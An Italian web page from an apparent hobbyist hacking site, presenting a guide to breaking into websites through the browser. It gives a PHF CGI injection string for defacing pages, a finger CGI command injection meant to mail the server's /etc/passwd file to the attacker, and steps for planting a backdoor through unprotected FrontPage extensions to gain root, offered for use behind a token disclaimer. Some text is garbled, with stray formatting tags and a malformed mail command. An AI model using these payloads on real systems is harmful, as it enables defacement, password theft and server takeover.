(`._.[o.OKinG-InFeTO.o]._.)


Vai ai contenuti

Bucare un sito 2

HkG > Fg

Inquesta guida spiege come BUCARE UN SITO WEB

 (ricordo che farlo e inlegale quindi non mi assumo nessuna responsabilit nell'uso che ne verr fatto)

 

I Browser Attack sono quegli attacchi che vengono fatti dal vostro browser,senza particolari software.Oltre ai vari attacchi PHF e Query,ci sono anche altri attacchi o varianti di PHF/Query

 

Cambiare una pagina web dal tuo browser

Questa la stinga da usare per modificare una pagina web da tuo browser.

All'indirizzo http://www.sito.com aggiungiamo la seguente stringa cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Crepa Lamer!!!"%20>>filename.html(questa una variante del PHF).

 

Questa stringati permette di scrivere su filename.html e aggiungere "Crepa Lamer!!!" devono essere in formato html. Puoi inserire del testo delle immagini o qualsiasi altra cosa tu voglia.

 

Finger box hacking:

Diciamo di voler "bucare" un sito tipo www.tal de talis.com. La prima cosa da fare sara' scivere l'URL Http://www.tal de talis.com. [/color

]

Poi aggiungete all'url [color=red]/cgi-bin/finger

 

in modo da ottenere Http://www.aol.com/cgi-bin/finger.

 

Se il finger e' attivo un box dovrebbe apparire per inserire il nome della persona su cui eseguire il comando.

 

Se questo avviene tu hai la possibilita' di ricevere il file /etc/passwd.

 

La prossima cosa da fare sara' di trovare un mailto sulla web page ([email protected] de talis.com o [email protected] de talis.com ad esempio).

 

Ora ritorna al box e scrivi: [email protected] de talis.com;/bin/mail [email protected] > /etc/passwd ...questa stringa manda a voi una mail da [email protected] de talis.com contenente il file delle password(libiiiiidine!!!)

 

FrontPage

 

Il metodo che citer adesso serve x inserire una backdoor in un sito che ha le estensioni di FrontPage. Per sapere se un sito ha le estensioni di FrontPage:

O c' scritto direttamente sulla home page del sito. O guardate L'html della home page,e dovreste notare una cosa del genere:

meta name="GENERATOR" content="Microsoft FrontPage 3.0"

Apriamo il FrontPage98 o FrontPage Express e clicchiamo su File.

 

Apriamo Front Page Box,poi scegliamo la voce Apri Web esistente,mettiamo il sito da hackerare e premiamo OK.

 

Appena connessi, se ci chieder la password dobbiamo lasciar stare,ma se non c' la chieder(cosa molto probabile),il 50%del lavoro fatto.

 

Entriamo nella cartella CGI-BIN e facciamo un Up-Load e ci mettiamo una backdoor.

 

Andiamo al nostro amato browser,

 

digitiamo:htto://server_vittima/cgi-bin/nome_della_backdoor.exe cos facciamo partire la nostra backdoor.

 

Adesso il server non ci dar nessuna risposta,e andiamo a vedere subito se la backdoor stata attivata.

 

Se s,siamo root.

 

Se invece la backdoor non viene attivata,dovete dare il tempo al server di aggiornarsi e far eseguire il trojan.

Creative Commons License
Questo sito pubblicato sotto una Licenza Creative Commons

Home Page | Regole dell'Hacker | Contattaci | HkG | VR | Video TuToRial | HkG M | C++ | Wdw$ X | Mappa del sito


Sito protetto da CoPyRiGhT 2008/2009 | [email protected]

Torna ai contenuti | Torna al menu